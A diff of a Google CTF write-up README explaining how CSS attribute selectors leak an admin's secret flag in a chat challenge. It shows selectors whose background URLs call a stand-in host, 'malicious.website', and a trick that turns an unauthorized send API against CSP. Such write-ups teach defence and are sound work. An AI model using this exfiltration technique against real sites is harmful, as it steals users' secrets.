terjanq/google-ctf-writeups/README.md

 Firstly, we used the fact that anyone can join the same room, so we used two windows to observe the outcome.
 Then we changed our name to the payload above to finally call for an admin just to provoke him with the message *I ❤ dogs!* in a moment he joins.
 As we can see, every participant's window in the chat room, except the one getting banned, should likely turn into red.

 But how could we use this finding to steal the admin's secret key?
-Well, this is the question that we have no direct response on yet but the idea is to generate a proper set of [CSS Selector Rules] sending the sensitive data over.
+Well, this is the question that we have no direct answer on yet but the idea is to generate a proper set of [CSS Selector Rules] sending the sensitive data over.
 I will shortly explain how these selectors work in a simple example.
 Suppose we have exactly one `<input id="secret" value="Top Secret Value"/>` element on the page and two selectors `#secret[value^=T]{background: url(http://malicious.website/?ch=T)}` and `#secret[value^=t]{background: url(http://malicious.website/?ch=t)}`.
-In natural language it translate to *If element of id 'secret' starts with the prefix '&lt;prefix&gt;' set its background value to '&lt;color&gt;'*.
+In natural language it translates to *If element of id 'secret' starts with the prefix '&lt;prefix&gt;' set its background value to '&lt;color&gt;'*.
 The important thing here is that the content from the provided *URL* will not be preloaded.
 It means that it's only fetched when the element is going to be rendered.
 Thanks to it, we can get to know each character in the `value` attribute by consistently expanding out the prefix of already known characters.

 ## Self Injection
 But hey, we cannot send any information outside the domains included in the `CSP` header!
 So how can we acquire it?
 And what exactly are we going to steal in the first place?

 Let's find an answer to the second question first.
-We know that there is a special command `/secret <new password>` which basically sets a new password with the following calling the ``display(`Successfully changed secret to <span data-secret="${esc(cookie('flag'))}">*****</span>`)`` function.
+We know that there is a special command `/secret <new password>` which basically sets a new password with the call of the ``display(`Successfully changed secret to <span data-secret="${esc(cookie('flag'))}">*****</span>`)`` function.
 This has to be it!
 We can make the selectors to look like `span[data-secret^=<prefix>]{background: url(...)}`.
 But we still don't know how exactly could we obtain an information without sending the information out.
 This is the tricky part.
-We will use the fact that any `API` call is not being authorized, so making the URL `url(send?name=flag&msg=<prefix>)` shall result with a new message from the *flag* user on the chat, containing the prefix of the fetched secret if and only if such element exists on the page.
+We will use the fact that any `API` call is not being authorized, so making the URL `url(send?name=flag&msg=<prefix>)` shall result with a new message from the *flag* user on the chat containing the prefix of the fetched secret if and only if such element exists on the page.
 So let's try this out!

 ![self_injection]